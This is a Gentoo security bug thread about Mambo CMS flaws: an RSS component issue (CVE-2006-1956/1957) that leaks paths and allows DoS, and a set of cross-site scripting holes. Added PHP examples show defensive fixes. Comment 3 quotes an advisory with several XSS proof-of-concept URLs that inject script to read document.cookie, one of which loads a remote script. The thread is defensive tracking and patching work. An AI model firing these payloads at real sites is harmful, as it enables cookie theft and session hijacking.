Bug 130584 - www-apps/mambo - unvalidated user input in rss component (CVE-2006-195{6|7})
Summary: www-apps/mambo - unvalidated user input in rss component (CVE-2006-195{6|7})
Status: RESOLVED FIXED
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities
Hardware: All Linux
Importance: High trivial
Assignee: Gentoo Security
Whiteboard: ~3 [noglsa]
Reported: 2006-04-20 03:48 UTC by Carsten Lohrke (RETIRED)
Modified: 2006-06-22 11:22 UTC
Description Carsten Lohrke (RETIRED) gentoo-dev 2006-04-20 03:48:45 UTC
The script does not properly validate user-supplied input in rss.php. A remote user can supply a specially crafted URL to cause the system to display an error message that discloses the installation path, or force the script to create tons of superfluous XML files, which in some cases results in remote DoS attacks against the target.

http://www.kapda.ir/advisory-313.html
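The two failure modes named in the report (an error message that leaks the install path, and unbounded creation of cache files from a raw parameter) both come from trusting the request to choose a file name. The following is an added example of the defensive shape, not Mambo's own rss.php: it assumes a hypothetical "feed" query parameter selecting the format and a disk cache for the rendered XML, neither of which the report spells out.

```php
<?php
// Added example, not Mambo's own code: a hardened shape for a feed endpoint
// of the kind described in the report. Assumptions (not from the report):
// the format is selected by a hypothetical "feed" query parameter, and the
// rendered XML is cached on disk under a name that used to be built from
// that raw parameter.
declare(strict_types=1);

// Never echo PHP errors (and therefore file system paths) to the client.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// Fixed allowlist: the client picks a key, the server picks the file name.
// The number of cache files that can ever exist is bounded by this table.
const ALLOWED_FEEDS = [
    'RSS0.91' => 'rss091.xml',
    'RSS1.0'  => 'rss10.xml',
    'RSS2.0'  => 'rss20.xml',
    'ATOM'    => 'atom.xml',
];

/** Return the fixed cache file name for a requested format, or null. */
function feedCacheFile(string $requested): ?string
{
    $key = strtoupper(trim($requested));
    return ALLOWED_FEEDS[$key] ?? null;
}

/** Read a scalar query parameter; arrays (?feed[]=x) are treated as absent. */
function queryString(string $name): ?string
{
    $v = $_GET[$name] ?? null;
    return is_string($v) ? $v : null;
}

function buildFeedXml(string $format): string
{
    // Placeholder renderer; a real site would emit its items here.
    return "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!-- $format feed -->\n";
}

function serveFeed(string $cacheDir, ?string $requested): void
{
    $file = $requested === null ? null : feedCacheFile($requested);
    if ($file === null) {
        // One generic message for every bad value: no path, no trace.
        http_response_code(400);
        header('Content-Type: text/plain; charset=utf-8');
        echo "Unknown feed format\n";
        return;
    }
    $path = rtrim($cacheDir, '/') . '/' . $file;
    if (!is_file($path) || filemtime($path) < time() - 3600) {
        $format = array_search($file, ALLOWED_FEEDS, true);
        if (@file_put_contents($path, buildFeedXml((string) $format), LOCK_EX) === false) {
            error_log("feed cache write failed: $path"); // server-side log only
            http_response_code(500);
            header('Content-Type: text/plain; charset=utf-8');
            echo "Feed temporarily unavailable\n";
            return;
        }
    }
    header('Content-Type: application/xml; charset=utf-8');
    readfile($path);
}

serveFeed(__DIR__ . '/cache', queryString('feed'));
```

The point of the allowlist is that the request never contributes a single byte to the file name, so neither path traversal nor a flood of distinct cache files is possible; the error branches return fixed strings and log the detail server-side, which is what removes the path disclosure.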
Comment 1 Carsten Lohrke (RETIRED) gentoo-dev 2006-04-20 05:16:41 UTC
Apparently this has been fixed in Joomla 1.0.8 (bug 124082), but not in Mambo.
Comment 2 Thierry Carrez (RETIRED) gentoo-dev 2006-04-21 09:57:39 UTC
web-apps: not sure there is a fix published for this?
Comment 3 Raphael Marichez (Falco) (RETIRED) gentoo-dev 2006-05-25 06:56:39 UTC
Hi,

An XSS vuln has also been reported by rgod (http://archives.neohapsis.com/archives/bugtraq/2006-05/0491.html)

I don't file a new bug because AFAIK this XSS vuln is still in [upstream] status, the gravity is minor (~4), and the ebuild is ~arched.

Mambo <= 4.6. RC1 Cross Site Scripting

---------------------------------------

http://[target]/[path_to_mambo]/administrator/popups/index3pop.php?mosConfig_sitename=</title><script>alert(document.cookie)</script>
http://[target]/[path_to_mambo]/mambots/editors/mostlyce/jscripts/tiny_mce/popupImage.php?img_title=</title><script>alert(document.cookie)</script>
http://[target]/[path_to_mambo]/mambots/editors/mostlyce/jscripts/tiny_mce/plugins/caption/colorpicker.php?cur_colour=--%3E%3C/script%3E%3C/head%3E%3Cbody%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/[path_to_mambo]/mambots/editors/mostlyce/jscripts/tiny_mce/plugins/caption/colorpicker.php?func=--%3E%3C/script%3E%3C/head%3E%3Cbody%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/[path_to_mambo]/mambots/editors/mostlyce/jscripts/tiny_mce/plugins/caption/colorpicker.php?block=--%3E%3C/script%3E%3C/head%3E%3Cbody%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/[path_to_mambo]/mambots/editors/mostlyce/jscripts/tiny_mce/plugins/imgmanager/ImageManager/preview.php?image_src=http://location/evilscript.js
http://[target]/[path_to_mambo]/mambots/editors/mostlyce/jscripts/tiny_mce/plugins/imgmanager/ImageManager/preview.php?img_title=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

---------------------------------------
rgod
site: http://retrogod.altervista.org
mail: rgod at autistici org
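The quoted advisory injects into two output contexts: HTML text inside <title> (mosConfig_sitename, img_title) and an inline script block (cur_colour, func, block). The following is an added example of context-specific output encoding for those two contexts, written for this bug and not taken from Mambo or from rgod's advisory; function names and the assumption that the site name is read from server-side configuration rather than the request are illustration choices.

```php
<?php
// Added example, not Mambo's own code: context-specific output encoding for
// the two injection points the quoted advisory shows, a value inside
// <title> and a value inside an inline <script>. Function and parameter
// names are assumptions for the illustration.
declare(strict_types=1);

/** Encode for HTML text and attribute contexts (e.g. between <title> tags). */
function encHtml(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Encode for a JavaScript string literal inside an inline <script> block. */
function encJs(string $s): string
{
    // JSON_HEX_* emit <, >, &, ', " as \uXXXX and "/" is escaped as "\/",
    // so neither "</script>" nor "-->" can reach the HTML parser intact.
    $out = json_encode($s, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
    return $out === false ? '""' : $out;
}

/** Syntactic allowlist for a colour value; encoding is the second layer. */
function validColour(string $s): ?string
{
    return preg_match('/^#[0-9a-fA-F]{6}$/', $s) === 1 ? $s : null;
}

/** Scalar query parameter or null; arrays (?cur_colour[]=x) are treated as absent. */
function queryString(string $name): ?string
{
    $v = $_GET[$name] ?? null;
    return is_string($v) ? $v : null;
}

function renderColourPopup(string $sitename, ?string $curColour): string
{
    $colour = validColour($curColour ?? '') ?? '#ffffff';
    return "<!DOCTYPE html>\n<html><head>\n"
         . '<title>' . encHtml($sitename) . "</title>\n"
         . "<script>\nvar curColour = " . encJs($colour) . ";\n</script>\n"
         . "</head><body></body></html>\n";
}

// The site name comes from server-side configuration, never from the
// request (constructed sample value); only cur_colour is client-controlled.
$config = ['sitename' => 'Example </title> & site'];
echo renderColourPopup($config['sitename'], queryString('cur_colour'));
```

Two layers are deliberate: the colour is accepted only if it matches a fixed syntax, and whatever does reach the script block is still JSON-encoded with the HEX flags, so a value that slipped through validation would still render as a harmless string literal. The same idea applies to the other parameters in the advisory: pick the encoder by the context the value lands in, not by where it came from.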
Comment 4 Raphael Marichez (Falco) (RETIRED) gentoo-dev 2006-05-25 06:57:24 UTC
Concerning the RSS vuln, it's CVE-2006-1956 and CVE-2006-1957
Comment 5 Stuart Herbert (RETIRED) gentoo-dev 2006-05-31 00:31:21 UTC
UPSTREAM have released Mambo 4.5.4 the day before yesterday. I'll snag a copy, and see if it addresses these problems.

Best regards,
Stu
Comment 6 Raphael Marichez (Falco) (RETIRED) gentoo-dev 2006-06-11 13:39:01 UTC
(In reply to comment #5)
> UPSTREAM have released Mambo 4.5.4 day before yesterday.  I'll snag a copy, and
> see if it addresses these problems.
> 

Hi Stuart, your conclusion?
Comment 7 Renat Lumpau (RETIRED) gentoo-dev 2006-06-17 17:35:33 UTC
4.5.4 is in the tree, 4.5.3h removed. From the changelog:

5. Patched a low risk RSS vulnerability
Comment 8 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2006-06-22 11:22:01 UTC
Thx Renat. Closing with no GLSA.